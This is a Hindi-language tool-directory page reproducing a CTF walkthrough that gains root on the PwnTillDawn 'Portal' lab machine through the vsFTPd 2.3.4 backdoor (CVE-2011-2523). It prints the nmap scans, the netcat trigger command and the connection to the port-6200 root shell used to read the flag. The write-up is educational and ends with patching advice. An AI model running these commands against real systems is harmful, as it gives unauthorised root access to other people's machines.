Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PwnTillDawn-Portal-Walkthrough — 'Portal' मशीन के लिए एक विस्तृत पैठ परीक्षण वॉकथ्रू और शोषण रिपोर्ट, जो रूट एक्सेस प्राप्त करने के लिए CVE-2011-2523 (vsFTPd 2.3.4 Backdoor) पर केंद्रित है। | Kitploit
उपकरण/GitHubGitHub/tr00jan99/pwntilldawn-portal-walkthrough
विशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
tr00jan99/pwntilldawn-portal-walkthrough

PwnTillDawn-Portal-Walkthrough

'Portal' मशीन के लिए एक विस्तृत पैठ परीक्षण वॉकथ्रू और शोषण रिपोर्ट, जो रूट एक्सेस प्राप्त करने के लिए CVE-2011-2523 (vsFTPd 2.3.4 Backdoor) पर केंद्रित है।

रिपॉजिटरी देखें
25 महीने पहलेअभी तक समीक्षित नहीं

🔐 भेद्यता आकलन और प्रवेश परीक्षण (VAPT)

📌 परियोजना: लक्ष्य शोषण वॉकथ्रू

⚠️ यह परियोजना केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
सिस्टम तक अनधिकृत पहुंच सख्त वर्जित है।


👨‍💻 लेखक

SYAFIQ
भूमिका: मुख्य प्रवेश परीक्षक


🎯 लक्ष्य जानकारी

  • लक्ष्य आईपी: 10.150.150.12
  • ऑपरेटिंग सिस्टम: Ubuntu Linux
  • स्थिति: 🔴 गंभीर (बैकडोर का पता चला)
  • भेद्यता: CVE-2011-2523 (vsFTPd बैकडोर)

🧭 हमले का अवलोकन

चरणउपकरणविवरण
खोजNmapसक्रिय होस्ट के लिए नेटवर्क स्कैन करें
गणनाNmapसेवाओं और संस्करणों की पहचान करें
विश्लेषणNSE स्क्रिप्टज्ञात भेद्यता का पता लगाएं
शोषणNetcatबैकडोर को ट्रिगर करें
शोषणोत्तरटर्मिनलरूट एक्सेस प्राप्त करें और फ़्लैग प्राप्त करें

🚀 चरण-दर-चरण वॉकथ्रू

🔍 चरण 1: नेटवर्क टोही

नेटवर्क में सक्रिय होस्ट के लिए स्कैन करें:

root@kitploit:~
nmap -sn --unprivileged 10.150.150.10-30

✅ परिणाम:

-8 होस्ट का पता चला -लक्ष्य पहचाना गया: 10.150.150.12

🔎 चरण 2: सेवा गणना

खुले पोर्ट और सेवाओं को स्कैन करें:

root@kitploit:~
nmap -Pn -F --unprivileged -sV 10.150.150.12

✅ निष्कर्ष:

-पोर्ट 21 → FTP (vsftpd) -पोर्ट 22 → SSH (OpenSSH 8.2p1)

⚠️ चरण 3: भेद्यता स्कैनिंग

ज्ञात FTP बैकडोर भेद्यता की जाँच करें:

root@kitploit:~
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12

🚨 परिणाम:

-लक्ष्य कमजोर है -CVE-2011-2523 की पुष्टि

💣 चरण 4: शोषण

दुर्भावनापूर्ण उपयोगकर्ता नाम का उपयोग करके बैकडोर को ट्रिगर करें:

root@kitploit:~
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21

⚡ यह पोर्ट 6200 पर एक छिपा हुआ रूट शेल खोलता है

🔓 चरण 5: एक्सेस प्राप्त करें (रूट शेल)

बैकडोर से कनेक्ट करें और कमांड निष्पादित करें:

root@kitploit:~
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200

✅ परिणाम:

रूट एक्सेस प्राप्त हुआ uid=0(root) की पुष्टि

🏁 फ़्लैग प्राप्त हुआ:

root@kitploit:~
5ee499eb5d0b8e4269b13483e57adaa0b3815f48

🧠 मुख्य सीख

हमेशा पुरानी सेवाओं को अपडेट करें (vsFTPd कमजोर था) गलत कॉन्फ़िगर की गई सेवाएं पूरे सिस्टम से समझौता कर सकती हैं सरल स्कैन गंभीर कमजोरियों को उजागर कर सकते हैं -🛡️ सिफारिशें -🔄 FTP सेवा को नवीनतम संस्करण में अपडेट करें -🚫 अनावश्यक सेवाएं अक्षम करें -🔐 एक्सेस को प्रतिबंधित करने के लिए फायरवॉल का उपयोग करें -📊 नियमित सुरक्षा ऑडिट करें -📚 अस्वीकरण

यह परियोजना सख्ती से इसके लिए बनाई गई है:

साइबर सुरक्षा सीखना नैतिक हैकिंग अभ्यास अधिकृत प्रवेश परीक्षण

❌ इस ज्ञान का उपयोग अवैध गतिविधियों के लिए न करें।

⭐ अंतिम नोट

"सुरक्षा कोई उत्पाद नहीं, बल्कि एक प्रक्रिया है।" — हमेशा परीक्षण करें, निगरानी करें और सुधार करें।

टूल डाउनलोड करें